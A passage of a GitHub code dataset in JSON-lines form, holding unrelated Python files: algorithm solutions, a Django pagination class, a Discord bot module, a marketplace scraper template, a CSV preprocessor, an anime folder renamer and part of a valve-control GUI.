(towers[0] == 0):\n return float('inf')\n\n jumps[0] = 0\n\n for i in range(1, n):\n jumps[i] = float('inf')\n for j in range(i):\n if (i <= j + towers[j]) and (jumps[j] != float('inf')):\n jumps[i] = min(jumps[i], jumps[j] + 1)\n break\n\n if jumps[n-1] != float('inf'):\n print(\"hopping with {} numbers of jumps\".format(jumps[n-1]))\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n # seq = [4, 2, 0, 0, 2, 0]\n # seq = [1, 0]\n # seq = [4, 2, 0, 0, 2, 0, 7, 0, 3, 1, 0]\n # seq = [4, 2, 0, 0, 2, 0, 2, 0, 3, 1, 0]\n # seq = [4, 2, 0, 0, 2, 0, 2, 0, 1, 1, 0]\n # seq = [4, 2, 0, 0, 1, 0]\n seq = [1, 3, 6, 1, 0, 9]\n\n print(NativeSolution.is_hopable(seq))\n print(DynamicProgrammingSolution.is_hopable(seq))\n","repo_name":"avi3tal/knowledgebase","sub_path":"algo/problems/tower_hopper_problem.py","file_name":"tower_hopper_problem.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23471020991","text":"from queue import *\r\nfrom array import *\r\n\r\ndef reverse(a):\r\n return int(str(a)[::-1])\r\n\r\nf = open('A-small-attempt1.in', 'r')\r\nh = open('store.txt','r')\r\ng = open('output.txt', 'w')\r\n\r\nnum = int(f.readline())\r\nd = array('I',(0 for j in range(1000001)))\r\nfor k in range(1000001):\r\n d[k] = int(h.readline())\r\n \r\nfor i in range (num):\r\n N = int(f.readline())\r\n count = d[N]\r\n s = \"Case #\" + str(i+1) + \": \" + str(count) + '\\n'\r\n g.write(s)\r\n\r\nf.close()\r\ng.close()\r\nh.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_162/355.py","file_name":"355.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32138948746","text":"from collections import OrderedDict\n\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.response import Response\n\n\nclass PageSizeNumberPagination(PageNumberPagination):\n def get_paginated_response(self, data):\n return Response(OrderedDict([\n ('page_size', self.page_size),\n ('num_pages', self.page.paginator.num_pages),\n ('count', self.page.paginator.count),\n ('next', self.get_next_link()),\n ('previous', self.get_previous_link()),\n ('current_page_number', self.page.number),\n ('next_page_number', self.page.next_page_number() if self.page.has_next() else None),\n ('previous_page_number', self.page.previous_page_number() if self.page.has_previous() else None),\n ('results', data)\n ]))\n","repo_name":"night-crawler/reformogen","sub_path":"sample/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41147013621","text":"from objects.modulebase import ModuleBase\nfrom objects.permissions import PermissionEmbedLinks\nfrom objects.paginators import Paginator\n\nfrom discord import Embed, Colour\n\n\nclass Module(ModuleBase):\n\n usage_doc = '{prefix}{aliases}'\n short_doc = 'Get list of colors available for assigment'\n\n name = 'colors'\n aliases = (name, 'colours')\n category = 'Discord'\n bot_perms = (PermissionEmbedLinks(), )\n guild_only = True\n\n async def on_call(self, ctx, args, **flags):\n colors = await ctx.bot.pg.fetch(\n \"SELECT role_id FROM color_roles WHERE guild_id = $1\",\n ctx.guild.id\n )\n\n guild_roles = []\n missing_roles = []\n\n for c in colors:\n r = ctx.guild.get_role(c['role_id'])\n\n if r is None:\n missing_roles.append(c['role_id'])\n else:\n guild_roles.append(r)\n\n if missing_roles:\n await ctx.bot.pg.fetch(\n \"DELETE FROM color_roles WHERE guild_id = $1 AND role_id = ANY($2)\",\n ctx.guild.id, missing_roles\n )\n\n if not guild_roles:\n return await ctx.info('No color roles')\n\n guild_roles.sort(key=lambda x: x.position, reverse=True)\n\n lines = [f'{r.color} | {r.name}' for r in guild_roles]\n lines_per_chunk = 30\n chunks = [f'``` color | role name\\n{\"-\" * 53}\\n' + '\\n'.join(lines[i:i + lines_per_chunk]) + '```' for i in range(0, len(lines), lines_per_chunk)]\n\n p = Paginator(self.bot)\n for i, chunk in enumerate(chunks):\n e = Embed(\n title=f'Available colors ({len(lines)})',\n colour=Colour.gold(),\n description=chunk\n )\n e.set_footer(text=f'Page {i + 1} / {len(chunks)}')\n p.add_page(embed=e)\n\n await p.run(ctx)\n","repo_name":"Fogapod/KiwiBot","sub_path":"modules/utils/module_colors.py","file_name":"module_colors.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"} +{"seq_id":"4234830863","text":"import re\nfrom .base_template import MarketPlaceTemplate\n\n\nclass CannaZoneParser(MarketPlaceTemplate):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.parser_name = \"cannazone\"\n self.list_name_xpath = '(//div[contains(@class, \"product-information\")])[1]/h2/text()'\n self.vendor_xpath = '//div[contains(@class, \"product-information-vendor\")]//a[contains(@class, \"vendor_rating\")]/text()'\n self.description_text_xpath = '(//div[contains(@class, \"product-details\")]//div[contains(@class, \"content\")])[1]//text()'\n # main function\n self.main()","repo_name":"ken2190/Enterprise-Forum-Scraper","sub_path":"templates/cannazone_template.py","file_name":"cannazone_template.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22134319643","text":"import pandas as pd\nimport os\n\nclass CsvPreprocessor: \n\n @staticmethod\n def prefix_file_name_of(from_path, prefix=\"Augmented_\"):\n SEPARATOR = \"/\"\n return prefix + from_path.split(SEPARATOR)[-1]\n\n @staticmethod\n def _get_df(file_path):\n if(file_path is None):\n return\n \n return pd.read_csv(file_path)\n\n # returns path to which it saved file\n @staticmethod\n def _save_df(df, file_path, save_name):\n\n if(save_name == None):\n df.to_csv(file_path, header=True, index=False)\n return file_path\n else:\n SEPARATOR = \"/\"\n old_path = file_path.split(SEPARATOR)\n new_path = SEPARATOR.join(old_path[:-1]) + \"/\" + save_name\n df.to_csv(new_path, header=True, index=False)\n return new_path\n \n\n # Drops rows which conatins at least one null\n # Returns file path to the saved file\n @staticmethod\n def drop_null_containing_rows(file_path, save_name=None): \n df = CsvPreprocessor._get_df(file_path)\n df = df.dropna() \n return CsvPreprocessor._save_df(df, file_path, save_name)\n \n\n # Normalizes sepcified column values to [0,1] region\n # Returns file path to the saved file\n @staticmethod\n def normalize_columns(file_path, save_name=None, normalize_columns=[\"year\", \"km\", \"kw\"]):\n df = CsvPreprocessor._get_df(file_path)\n\n if(normalize_columns != None):\n for column_name in normalize_columns:\n df[column_name] = (df[column_name] - df[column_name].min()) / (df[column_name].max() - df[column_name].min()) \n\n return CsvPreprocessor._save_df(df, file_path, save_name)\n\n # one hot encodes specified column values\n # Returns file path to the saved file\n @staticmethod\n def one_hot_encode_columns(file_path, save_name=None, one_hot_columns=[\"trans\", \"fuel\"]): \n df = CsvPreprocessor._get_df(file_path)\n\n # One hot encode specified columns\n for col_name in one_hot_columns:\n # Get the one hot encoded columns\n one_hot_encoded = pd.get_dummies(df[col_name])\n # Drop the original column which we onehot encoded\n df = df.drop(columns=col_name)\n\n # Concatenate the together\n df = pd.concat([df, one_hot_encoded], axis=1)\n\n return CsvPreprocessor._save_df(df, file_path, save_name)\n \n # Adds the car which price we will be predicting to the dataframe\n # WARNING: Sets the car's price to None -> if we will call this before \n # drop_null_containing_rows our car will be drop\n @staticmethod\n def add_car_to_predict(file_path, car_dict, save_name=None):\n df = CsvPreprocessor._get_df(file_path)\n SPECIAL_COLUMN_NAME = \"IsCarToPredict\"\n\n # Add column which will make it stand apart from the rest of the dataset\n car_dict[SPECIAL_COLUMN_NAME] = True\n\n # Now add the same column to the rest of the dataset \n # but with different value\n df[SPECIAL_COLUMN_NAME] = False\n\n # Now append the car to the augmented df\n df = df.append(car_dict, ignore_index=True)\n\n return CsvPreprocessor._save_df(df, file_path, save_name)\n \n # Takes the car to predict from the dataset and returns it with the file path,\n # it also deletes column SPECIAL_COLUMN_NAME both from df and car\n @staticmethod\n def take_out_car_to_predict(file_path, save_name=None):\n df = CsvPreprocessor._get_df(file_path)\n SPECIAL_COLUMN_NAME = \"IsCarToPredict\"\n\n car_df = df[df[SPECIAL_COLUMN_NAME]].drop(columns=[SPECIAL_COLUMN_NAME])\n df = df[~df[SPECIAL_COLUMN_NAME]].drop(columns=[SPECIAL_COLUMN_NAME])\n\n return CsvPreprocessor._save_df(df, file_path, save_name), car_df\n\n\n\n\"\"\"\ndef main():\n # Usage example\n sample_car = {\n \"price\": None,\n \"year\": 2014, \n \"trans\": \"Automat\", \n \"fuel\": \"Diesel\", \n \"km\": 356000, \n \"kw\": 77.0,\n }\n abs_path = \"C:/Users/samue/Desktop/Skola/others/CarCost/data/Audi_e-tron.csv\"\n new_file_name = CsvPreprocessor.prefix_file_name_of(abs_path)\n\n curr_path = CsvPreprocessor.drop_null_containing_rows(abs_path, new_file_name)\n curr_path = CsvPreprocessor.add_car_to_predict(curr_path, sample_car)\n curr_path = CsvPreprocessor.normalize_columns(curr_path)\n curr_path = CsvPreprocessor.one_hot_encode_columns(curr_path)\n\n curr_path, car_df = CsvPreprocessor.take_car_to_predict(curr_path)\n print(car_df)\n \n\nif __name__ == \"__main__\":\n main()\n#\"\"\"","repo_name":"SamuelMintal/CarCost","sub_path":"src/csv_preprocessor.py","file_name":"csv_preprocessor.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7496985796","text":"from __future__ import print_function\nfrom utils import GuessArchitecture\narch = GuessArchitecture()\n\n# assume 64 bit unless set specifically\nprint(GuessArchitecture() \\\n .replace('ia32', 'x64') \\\n .replace('ppc', 'ppc64') \\\n .replace('arm', 'arm64') \\\n .replace('s390', 's390x'))\n","repo_name":"nodejs/node","sub_path":"tools/getarch.py","file_name":"getarch.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":99492,"dataset":"github-code","pt":"61"} +{"seq_id":"34140168871","text":"\"\"\"\r\nAuto Anime Folder Renamer\r\nSilverVeritas\r\n2-12-2021\r\n\r\nThis will rename folder in the current directory. It does this by:\r\n1. Looks a folder in the current directory and cleans it up\r\n2. Searches MAL for the scrapes for corresponding anime entry (Google searching was supported but it can lead to getting\r\nrate limited (HTTPError 429) and prevents functionality)\r\n3. Adds a '~' to the end of file to determine that that file has been formatted\r\n4. Files that cannot be properly named are prepended by an '@'\r\n5. If wrong MAL link is found then enter 'n' and enter the correct MAL link\r\n\r\n⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠄⠄⠄⠄\r\n⠄⠄⠄⠄⠄⢀⣀⣀⡀⠄⠄⠄⡠⢲⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠄⠄\r\n⠄⠄⠄⠔⣈⣀⠄⢔⡒⠳⡴⠊⠄⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⣿⣿⣧⠄⠄\r\n⠄⢜⡴⢑⠖⠊⢐⣤⠞⣩⡇⠄⠄⠄⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠄⠝⠛⠋⠐\r\n⢸⠏⣷⠈⠄⣱⠃⠄⢠⠃⠐⡀⠄⠄⠄⠄⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠸⠄⠄⠄⠄\r\n⠈⣅⠞⢁⣿⢸⠘⡄⡆⠄⠄⠈⠢⡀⠄⠄⠄⠄⠄⠄⠉⠙⠛⠛⠛⠉⠉⡀⠄⠡⢀⠄⣀\r\n⠄⠙⡎⣹⢸⠄⠆⢘⠁⠄⠄⠄⢸⠈⠢⢄⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠃⠄⠄⠄⠄⠄\r\n⠄⠄⠑⢿⠈⢆⠘⢼⠄⠄⠄⠄⠸⢐⢾⠄⡘⡏⠲⠆⠠⣤⢤⢤⡤⠄⣖⡇⠄⠄⠄⠄⠄\r\n⣴⣶⣿⣿⣣⣈⣢⣸⠄⠄⠄⠄⡾⣷⣾⣮⣤⡏⠁⠘⠊⢠⣷⣾⡛⡟⠈⠄⠄⠄⠄⠄⠄\r\n⣿⣿⣿⣿⣿⠉⠒⢽⠄⠄⠄⠄⡇⣿⣟⣿⡇⠄⠄⠄⠄⢸⣻⡿⡇⡇⠄⠄⠄⠄⠄⠄⠄\r\n⠻⣿⣿⣿⣿⣄⠰⢼⠄⠄⠄⡄⠁⢻⣍⣯⠃⠄⠄⠄⠄⠈⢿⣻⠃⠈⡆⡄⠄⠄⠄⠄⠄\r\n⠄⠙⠿⠿⠛⣿⣶⣤⡇⠄⠄⢣⠄⠄⠈⠄⢠⠂⠄⠁⠄⡀⠄⠄⣀⠔⢁⠃⠄⠄⠄⠄⠄\r\n⠄⠄⠄⠄⠄⣿⣿⣿⣿⣾⠢⣖⣶⣦⣤⣤⣬⣤⣤⣤⣴⣶⣶⡏⠠⢃⠌⠄⠄⠄⠄⠄⠄\r\n⠄⠄⠄⠄⠄⠿⠿⠟⠛⡹⠉⠛⠛⠿⠿⣿⣿⣿⣿⣿⡿⠂⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\r\n⠠⠤⠤⠄⠄⣀⠄⠄⠄⠑⠠⣤⣀⣀⣀⡘⣿⠿⠙⠻⡍⢀⡈⠂⠄⠄⠄⠄⠄⠄⠄⠄⠄\r\n⠄⠄⠄⠄⠄⠄⠑⠠⣠⣴⣾⣿⣿⣿⣿⣿⣿⣇⠉⠄⠻⣿⣷⣄⡀⠄⠄⠄⠄⠄⠄⠄⠄\r\n\"\"\"\r\nimport os\r\nimport re\r\nfrom datetime import time\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom googlesearch import search\r\nfrom urllib.error import HTTPError\r\n\r\n\r\ndef clean(FileName):\r\n FileName = re.sub(\"\\[.*?\\]\", \"\", FileName)\r\n return FileName\r\n\r\n\r\ndef search_google(anime_name):\r\n # SearchResults = search(\"MyAnimeList \" + anime_name + \" -nyaa.si\", num_results=2)\r\n SearchResults = search(\"site:myanimelist.net \" + anime_name + \" -nyaa.si\", num_results=2)\r\n print(SearchResults)\r\n return SearchResults[0]\r\n\r\n\r\ndef search_mal(anime_name):\r\n searcher = 'https://myanimelist.net/anime.php?q='\r\n searcher = searcher + anime_name\r\n mal = requests.get(searcher)\r\n soup = bs(mal.content, features=\"html.parser\")\r\n a = soup.find_all(\"a\")\r\n target = str(a[90])\r\n target = re.findall(r'(https?://[^\\s]+)', target)\r\n target = str(target)\r\n target = target[2:-8]\r\n return target\r\n\r\n\r\ndef clean_html(raw_html):\r\n cleanr = re.compile('<.*?>')\r\n cleantext = re.sub(cleanr, '', raw_html)\r\n return cleantext\r\n\r\n\r\ndef find_Title(url):\r\n mal = requests.get(url)\r\n soup = bs(mal.content, features=\"html.parser\")\r\n h1 = soup.find_all(\"h1\")[0]\r\n japName = clean_html(str(h1))\r\n p = soup.find_all(\"p\")[0]\r\n EnName = clean_html(str(p))\r\n illegal = ['*', '.', '\"', \"\\\\\", '/', '[', ']', ':', ';', '|', ',', '?']\r\n for char in illegal:\r\n japName = japName.replace(char, '')\r\n EnName = EnName.replace(char, '')\r\n\r\n if (len(EnName) > 100):\r\n return japName, \"NO ALT NAME\"\r\n return japName, EnName\r\n\r\n\r\ndef name_format(jName, eName):\r\n if (eName == \"NO ALT NAME\"):\r\n return jName+\"~\"\r\n return f'{jName} ({eName})~'\r\n\r\n\r\ndef main(file):\r\n cleaned = clean(file)\r\n print(f\"\\nThe current file is {file}\")\r\n Result = search_mal(cleaned)\r\n userInp = ''\r\n correct = ''\r\n while userInp not in ['y', 'n']:\r\n userInp = input(f'Is this the correct link? (y,n)\\n{Result}\\n')\r\n\r\n if userInp == 'n':\r\n print(\"Do this manually. MAL returned unexpected result.\")\r\n print('Enter correct MAL link.')\r\n correct = input()\r\n print()\r\n Result = correct\r\n\r\n t = find_Title(Result)\r\n name = name_format(t[0], t[1])\r\n\r\n userInp = ''\r\n while userInp not in ['y', 'n']:\r\n userInp = input(f'Is this the correct name? (y,n)\\n{name}\\n')\r\n\r\n if userInp == 'n':\r\n print(\"Do this manually. Name will not be Changed.\")\r\n return\r\n\r\n return name\r\n\r\n\r\n# Change the current directory here\r\ndirectory = r\"Z:\\Downloads\\completed\"\r\n\r\nos.chdir(directory)\r\ni = 0\r\nx = []\r\nfor f in os.listdir():\r\n x.append(f)\r\n\r\nfor file in x:\r\n if os.path.isdir(file):\r\n try:\r\n currFile = file\r\n if currFile[-1:] == '~':\r\n print(f'File was not changed: {currFile}')\r\n print(\"~\" * 50)\r\n continue\r\n newName = main(file)\r\n os.rename(file, newName)\r\n print(f'File name change:\\n{currFile}\\n{newName}')\r\n print(\"~\"*50)\r\n\r\n except Exception as e:\r\n print(\"You made a fucky wucky.\")\r\n print(e)\r\n print('Adding a marker')\r\n os.rename(file, '@' + file)\r\n except HTTPError as h:\r\n time.sleep(5)\r\n print(\"Dang we fucked up fam.\")\r\n\r\n else:\r\n print(f'\"\\n{file}\" is not a folder.')\r\n","repo_name":"SilverVeritas/FileRenaming","sub_path":"Rename.py","file_name":"Rename.py","file_ext":"py","file_size_in_byte":5649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18239654259","text":"from datasets import load_dataset\nimport json\nimport os\n\ndataset = load_dataset(\"jayantdocplix/medical_dataset_chat\", \"main\")\n\ndataset_splits = {\"train\": dataset[\"train\"], \"test\": dataset[\"test\"]}\nprint(dataset_splits)\n\n\ndef main():\n if not os.path.exists(\"data_med\"):\n os.mkdir(\"data_med\")\n\n with open(\"data_med/tokens.json\", \"w\") as f:\n tokens = {}\n tokens[\"tokens\"] = [\"\", \"\", \"\", \"\"]\n f.write(json.dumps(tokens))\n\n for key, ds in dataset_splits.items():\n with open(f\"data_med/{key}.jsonl\", \"w\") as f:\n for item in ds:\n newitem = {}\n newitem[\"input\"] = (\n f\"{item['input']}\"\n f\"{item['answer_chatdoctor']}\"\n )\n f.write(json.dumps(newitem) + \"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yuanconghao/llama2-finetuning","sub_path":"create_dataset_medical.py","file_name":"create_dataset_medical.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"3052169743","text":"#MIT License\r\n#\r\n#Copyright (c) 2017 Jonathan A. White\r\n#\r\n#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n#\r\n#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n#\r\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n\r\n\r\nfrom Step import Step\r\nfrom LabelEntry import LabelEntry\r\ntry:\r\n from Tkinter import * #python 2.7\r\nexcept:\r\n from tkinter import * #python 3\r\nfrom ValveController import ValveController\r\n\r\n# ValveSteps are Steps in a Routine that open or close valves.\r\nclass ValveStep(Step):\r\n parameter = \"Open/close valve\" # this text is included in add step dialog boxes.\r\n\r\n # ValveStep.__init__: intializes ValveStep\r\n # Input:\r\n # _super - parent Tkinter frame object in which to draw ValveStep instance\r\n # Output: None\r\n def __init__(self, _super):\r\n Step.__init__(self, _super)\r\n self.Valve = LabelEntry(self.box, 0, 0, \"Valve:\", width = 16)\r\n self.Valve.expression = False\r\n self.State = LabelEntry(self.box, 0, 2, \"State:\", width = 16)\r\n self.State.expression = False\r\n self.entries = [self.Valve, self.State]\r\n self.steptype = \"ValveStep\"\r\n\r\n # ValveStep.run: executes valve opening and closing\r\n # Inputs:\r\n # cleanup - does nothing for this class. Accepted as an argument because routines pass it to every object in\r\n # their steps list. Other Step derivatives and loops use it.\r\n # iter - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n # Output: None\r\n def run(self, cleanup = None, iter = None):\r\n valves = []\r\n states = []\r\n for j in range(len(self.Valve.saved)):\r\n i = iter\r\n if self.Valve.expression:\r\n valves.append(eval(self.Valve.saved[j], {}, {'i' : i}))\r\n else:\r\n valves.append(int(self.Valve.saved[j]))\r\n if self.State.expression:\r\n states.append(eval(self.State.saved[j], {}, {'i' : i}))\r\n else:\r\n states.append(int(self.State.saved[j]))\r\n if states[-1] == 1:\r\n Step.btndict[valves[-1]].config(bg=\"green\")\r\n else: # the saved state is 0\r\n Step.btndict[valves[-1]].config(bg=\"gray\")\r\n self.setValves(valves, states)\r\n Step.pause(self, 0)\r\n self.checkIfCancel()\r\n\r\n # ValveStep.saveEntries: save user entries for running or writing to file\r\n # Inputs:\r\n # type - data type that entries should be. Valve entries should be ints.\r\n # iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n def saveEntries(self, type=\"int\", iters=None):\r\n stateEntry = self.State.get()\r\n valveEntry = self.Valve.get()\r\n\r\n #first check if inputs are list, then check each entry\r\n stateEntry = stateEntry.replace(' ', '') #remove spaces\r\n states = tuple(stateEntry.rsplit(','))\r\n valves = tuple(valveEntry.rsplit(','))\r\n\r\n\r\n if len(set(valves)) < len(valves):\r\n raise ValueError(\"There are duplicate pin entries.\")\r\n\r\n if len(states) != len(valves):\r\n if len(states) == 1:\r\n states = tuple(list(states)*len(valves))\r\n else:\r\n raise ValueError(\"The number of valves and states entered in Valve Step are different.\")\r\n\r\n self.Valve.expression = [0]*len(states)\r\n self.State.expression = [0]*len(states)\r\n\r\n # check that all entries are valid\r\n for i in range(len(states)):\r\n self.checkValveStateEntry(valves[i], states[i], iters, listNum = i)\r\n\r\n #Save Entries\r\n self.State.saved = states\r\n self.Valve.saved = valves\r\n\r\n # ValveStep.checkValveStateEntry: Checks whether entries are valid. If step is in a loop and has an expression\r\n # That evaluates as a function of the loop iteration, recursively checks if it is valid for all loop iterations.\r\n # Inputs:\r\n # valve - user valve entry\r\n # state - user state entry\r\n # iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n # listNum - the position in the comma separated list of user entered valves/states.\r\n def checkValveStateEntry(self, valve, state, iters, listNum = None):\r\n if not iters: # just look for integers\r\n try:\r\n valve1 = int(valve)\r\n except:\r\n raise ValueError(valve + \" is not an available valve. Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"] + \".\")\r\n if valve1 not in self.btndict:\r\n raise ValueError(valve + \" is not an available valve. Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"] + \".\")\r\n if state not in (\"0\", \"1\"):\r\n raise ValueError(\"Valve state \" + state +\" is not allowed. \"\r\n \"The valve state must be either 1 (energized) or 0 (not energized).\")\r\n self.setEntryExpressionBool(listNum, False, False)\r\n return\r\n\r\n try:\r\n valve = int(valve)\r\n valveIsInt = True\r\n except:\r\n valveIsInt = False\r\n if valveIsInt:\r\n if valve not in self.btndict:\r\n raise ValueError(\"Valve \" + str(valve) + \" is not available. Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"])\r\n if valveIsInt and state in (\"0\",\"1\"):\r\n self.setEntryExpressionBool(listNum, False, False)\r\n return\r\n elif state in (\"0\", \"1\"): #then either the valve entry is an expression or an error\r\n self.recursiveIterCheck(iters, valve, self.checkValidValveEntry, ())\r\n self.setEntryExpressionBool(listNum, True, False)\r\n elif valveIsInt: # Either the state entry is a correct python expression or an error\r\n self.recursiveIterCheck(iters, state, self.checkValidStateEntry, ())\r\n self.setEntryExpressionBool(listNum, False, True)\r\n else: #Both the state and valve entries are either expressions or errors\r\n self.recursiveIterCheck(iters, state, self.checkValidStateEntry, ())\r\n self.recursiveIterCheck(iters, valve, self.checkValidValveEntry, ())\r\n self.setEntryExpressionBool(listNum, True, True)\r\n\r\n # ValveStep.setEntryExressionBool: Sets whether each user entered state/valve is an expression or hard value.\r\n # Inputs:\r\n # entry - position in the user entered comma-separated list of valves/states.\r\n # valveExprBool - 1 if expression, 0 if not\r\n # stateExprBool - 1 if expression, 0 if not\r\n # Outputs: None\r\n def setEntryExpressionBool(self, entry, valveExprBool, stateExprBool):\r\n self.State.expression[entry] = stateExprBool\r\n self.Valve.expression[entry] = valveExprBool\r\n\r\n # ValveStep.checkValidValveEntry: Evaluates an expression for a valve entry with given loop iterations and checks\r\n # whether it is valid.\r\n # Inputs:\r\n # valve - expression for a valve\r\n # i - tuple of the iterations of all loops in which the valve step is nested inside.\r\n # Outputs: None, but raises error if the valve entry is invalid at the given loop iterations.\r\n def checkValidValveEntry(self, valve, i):\r\n try:\r\n valve1 = eval(valve, {}, {'i': i})\r\n print(i, valve1)\r\n except Exception as E:\r\n self.checkIfHasi(valve)\r\n raise ValueError(\"Valve entry must either be an available valve or a valid python expression \"\r\n \"evaluating to an available valve. Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"] + \". \" + Step.NestingRuleStatement)\r\n if valve1 not in self.btndict:\r\n raise ValueError(\"Valve entry \" + valve + \" evaluates to \" + str(valve1) + \" on iteration \"\r\n + self.iterToString(i) + \". Available valves are \" + self.btndict[\r\n \"AvailablePinsStatement\"])\r\n\r\n # ValveStep.checkValidStateEntry: Evaluates an expression for a state entry with given loop iterations and checks\r\n # whether it is valid.\r\n # Inputs:\r\n # ste - expression for a state\r\n # i - tuple of the iterations of all loops in which the valve step is nested inside.\r\n # Outputs: None, but raises error if the state entry is invalid at the given loop iterations.\r\n def checkValidStateEntry(self, state, i):\r\n try:\r\n state = eval(state,{}, {'i':i})\r\n except:\r\n self.checkIfHasi(state)\r\n raise ValueError(\"Valve state \" + state +\" is not allowed. \"\r\n \"State entries for valve steps must either be 1 (energized), 0 (denergized)\"\r\n \" or, if in a loop, a python expression evaluating to 0 or 1.\" + Step.NestingRuleStatement)\r\n if state not in (0, 1):\r\n raise ValueError(\"State entries for valve steps must either be 1 (energized), 0 (denergized),\"\r\n \" or a python expression evaluating to 1 or 0. For interation \" + self.iterToString(i)\r\n +\" the expression evaluates to \" + str(state) + \".\")\r\n\r\n # ValveStep.setValves: Sends a serial command through a ValveController object to set valve states. Set upon\r\n # ValveController object's initialization in the KATARAGUI.connect method.\r\n # Inputs:\r\n # valve - tuple of valves to set the state of\r\n # state - tuple of states to set corresponding valves to.\r\n # Output: None\r\n def setValves(self, valve, state):\r\n raise NotImplementedError(\"Error: ValveStep.setValve must be set upon initialization of the device.\")\r\n\r\n# PumpSteps are steps in a Routine that run peristaltic pumping sequences.\r\nclass PumpStep(Step):\r\n parameter = \"Pump\"\r\n\r\n # PumpStep.__init__\r\n # Input:\r\n # _super - parent Tkinter frame object in which to draw ValveStep instance\r\n # Output: None\r\n def __init__(self, _super):\r\n Step.__init__(self, _super)\r\n self.box.config(text = \"Pump\")\r\n self.rate = LabelEntry(self.box, 0, 0, \"Rate (cycles/s):\", width = 3)\r\n self.nCycles = LabelEntry(self.box, 0, 2, \"Number of Cycles:\", width = 9)\r\n self.steptype = \"PumpStep\"\r\n\r\n valvesbox = LabelFrame(self.box)\r\n valvesbox.grid(row = 1, column = 0, columnspan = 10)\r\n self.valveEntries = []\r\n for valve in (1,2,3):\r\n self.valveEntries.append(LabelEntry(valvesbox, 1, 2*valve, \" --> Valve \" + str(valve) + \": \", width = 2))\r\n self.entries = [self.rate, self.nCycles]+ self.valveEntries\r\n\r\n # PumpStep.saveEntries: Saves user entered entries in PumpStep for running or writing to saved file. If there are\r\n # Expressions that evaluate as a function of loop iteration, all loop iterations are checked recursively.\r\n # Inputs:\r\n # type - data type the user entries should be, for PumpStep, should be ints.\r\n # iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n # Output: None\r\n def saveEntries(self, type=\"int\", iters=None):\r\n rate = self.rate.get()\r\n cycles = self.nCycles.get()\r\n\r\n # Check if valve entries are ok for all loop iterations.\r\n valves = []\r\n allInt = True\r\n for v in self.valveEntries:\r\n v0 = v.get()\r\n valves.append(v0)\r\n try:\r\n v1 = int(v0)\r\n if v1 not in self.btndict:\r\n raise ValueError(v0 + \" in pump step is not a valid valve. Valid valves are \" +\r\n self.btndict[\"AvailablePinsStatement\"] + \".\")\r\n v.expression = False\r\n except:\r\n if not iters:\r\n raise ValueError(v0 + \" in pump step is not a valid valve. Valid valves are \" +\r\n self.btndict[\"AvailablePinsStatement\"] + \".\")\r\n else: #check if valid expression fo valve\r\n 